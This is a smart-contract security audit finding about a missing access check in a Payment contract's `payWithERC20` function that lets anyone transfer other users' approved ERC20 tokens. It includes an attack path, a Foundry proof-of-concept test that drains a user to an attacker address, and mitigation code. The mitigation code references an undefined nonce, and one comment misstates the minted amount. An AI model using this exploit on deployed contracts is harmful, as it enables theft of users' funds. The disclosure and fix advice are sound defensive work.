Main Infrared Loris

High

# Critical Unauthorized ERC20 Token Draining Vulnerability in Payment Contract's payWithERC20 Function

### Summary

The absence of access control or signature verification in the `payWithERC20` function will cause a complete loss of funds for users as an attacker will exploit the public nature of the function to transfer approved ERC20 tokens from users to themselves.

### Root Cause

In [Payment.sol:25-32](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/Payment.sol#L25-L32), the `payWithERC20` function is declared as `public` and lacks any form of authorization, such as signature verification or access control, allowing anyone to call it and initiate token transfers from users who have approved the `Payment` contract to spend their ERC20 tokens.

### Internal Pre-conditions

1. A user needs to call the ERC20 `approve` function to set the `Payment` contract's allowance to be at least the amount of tokens they intend to transfer.
2. The user’s approval must remain active (not revoked or reduced) before an attacker calls `payWithERC20`.

### External Pre-conditions

- None. The vulnerability depends entirely on internal contract interactions and user approvals, with no reliance on external protocol states.

### Attack Path

1. A user calls `approve(Payment.address, amount)` on the ERC20 token contract, granting the `Payment` contract permission to spend a specified amount of their tokens.
2. An attacker monitors the blockchain for such approvals or targets known users who have interacted with the `Payment` contract.
3. The attacker calls `payWithERC20(erc20TokenAddress, amount, userAddress, attackerAddress)` with:
   - `erc20TokenAddress`: The address of the ERC20 token.
   - `amount`: The approved amount (or a lesser value within the allowance).
   - `userAddress`: The address of the user who granted the approval.
   - `attackerAddress`: The attacker’s own address.
4. The `Payment` contract executes `safeTransferFrom(userAddress, attackerAddress, amount)`, transferring the user’s approved tokens to the attacker.

### Impact

The user suffers an approximate loss of the full amount of approved ERC20 tokens. The attacker gains the equivalent value of the tokens transferred from the user.

### PoC

```solidity
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.26;

import {Payment} from "../src/Payment.sol";
import "forge-std/Test.sol";
import {MockERC20} from "./MockERC20.sol";

contract PaymentTest is Test {
    Payment payment;
    MockERC20 token;
    address user = address(0x1);
    address attacker = address(0x2);

    function setUp() public {
        payment = new Payment();
        token = new MockERC20();
        token.mint(user, 1000e18); // mint 100 tokens to user
    }

    function testDrainApprovedTokens() public {
        vm.deal(address(token), 1000e18);
        vm.startPrank(user);
        // user approve max amount of tokens to payment contract
        token.approve(address(payment), type(uint256).max);
        vm.stopPrank();
        console.log("token balance of user before attack", token.balanceOf(user));
        console.log("token balance of attacker before attack", token.balanceOf(attacker));

        // attacker call payWithERC20 function
        vm.startPrank(attacker);
        payment.payWithERC20(address(token), 1000e18, address(user), address(attacker));
        vm.stopPrank();

        console.log("token balance of user after attack", token.balanceOf(user));
        console.log("token balance of attacker after attack", token.balanceOf(attacker));

        assertEq(token.balanceOf(attacker), 1000e18);
    }
}

```

### Mitigation

To address this vulnerability, consider the following recommendations:

1. **Restrict Access**: Implement access control to limit who can call `payWithERC20`. For example:
   - Use OpenZeppelin’s `Ownable` to restrict the function to the contract owner.
   - Introduce a role-based system where only authorized relayers can invoke the function.
   - Make the function internal/private

2. **Signature Verification**: Add a signature check to ensure the user authorizes each transfer. Example implementation:
   ```solidity
   function payWithERC20(
       address erc20TokenAddress,
       uint256 amount,
       address fromAddress,
       address toAddress,
       bytes memory signature
   ) public {
       // Verify signature from fromAddress for this transfer
       bytes32 messageHash = keccak256(abi.encodePacked(erc20TokenAddress, amount, toAddress, nonce));
       require(ECDSA.recover(messageHash, signature) == fromAddress, "Invalid signature");
       // Proceed with transfer
       IERC20(erc20TokenAddress).safeTransferFrom(fromAddress, toAddress, amount);
   }
   ```